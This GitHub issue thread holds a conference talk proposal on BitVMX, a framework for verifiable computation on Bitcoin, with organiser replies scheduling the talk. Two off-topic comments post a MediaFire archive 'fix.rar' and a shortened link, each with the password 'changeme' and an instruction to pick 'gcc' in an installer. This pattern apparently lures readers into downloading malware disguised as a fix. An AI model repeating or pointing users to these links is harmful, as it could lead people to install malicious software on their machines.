### ISSUE TITLE
Universal Computation on Bitcoin: a gentle introduction to BitVMX

### ISSUE THREAD

**Issue by azavalla** [TABConf/6.tabconf.com#104]
# Description
### What is this talk about? Give us as many details as possible.
The evolution of blockchain computation took a significant step forward in 2017 with the introduction of what we like to call Disputable Computation Paradigm, pioneered by TrueBit. Leveraging its low average on-chain computing cost, this paradigm became the foundation for optimistic rollups in building second-layer solutions. In 2023, Robin Linus adapted this approach for Bitcoin with the introduction of BitVM, marking a significant advancement in bringing efficient disputable computation to the Bitcoin network.

BitVMX builds upon the contributions of TrueBit and BitVM, presenting a novel CPU design that enables optimistic verification of arbitrary programs directly on Bitcoin. This framework supports common architectures like RISC-V and facilitates the execution of fully-compliant processors programmable through standard compilation toolchains. The core innovations of BitVMX include the use of hash chains for program traces, memory-mapped registers, and a robust challenge-response protocol, offering flexibility to balance transaction costs, round complexity, and prover/verifier costs. Bitvmx can do generic computation, so it is not only suitable for SNARK verification, but also for shorter tasks, such as payment channel integrity checks. Our goal is to establish a secure, extensible, open-source, peer-reviewed, and sidechain-agnostic framework that serves as a versatile foundation for developing blockchain bridges, aggregator oracles, SNARK/STARK verifiers, and more.

This talk will provide a basic yet complete introduction to BitVMX, covering its design, the challenges faced, and the solutions we found. Attendees will gain insight into how BitVMX achieves efficient on-chain verification and facilitates fast, cost-effective dispute resolutions.

### What would an attendee learn from this talk?
- BitVMX protocol.
- Stateful contracts (sharing state between Bitcoin transactions).
- Dispute resolution through message linking.

### Is there anything folks should read up on before they attend this talk?
If you're looking to familiarize yourself with BitVMX concepts or gain an early insight, consider reviewing these resources:
- https://bitvmx.org/files/bitvmx-whitepaper.pdf
- https://bitvmx.org/knowledge

### Relevant Links
- https://bitvmx.org/
- https://github.com/FairgateLabs/BitVMX

# About the Speaker
### Social Links
https://github.com/azavalla

# Talk Details
### Length of Talk
30 minutes.

### Preferred Day/Time Slot 
No preference.

*We will do our best to accommodate your requested time slot. Please let us know if there are any dates/times that ***absolutely do not work*** for you.*

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by horologger** [comment]
Seems like a worthy topic.  Upvote from me.

**Comment by asherp** [comment]
@azavalla We'll gladly give you a time slot in the NextGen village. accepted

**Comment by asherp** [comment]
@azavalla would you like to go before linus's talk or after? His is 10:30 Friday morning.

**Comment by azavalla** [comment]
@asherp I think it makes chronological sense to go after his talk

**Comment by iglesiasbrandon** [comment]
thank you for conducting this talk!
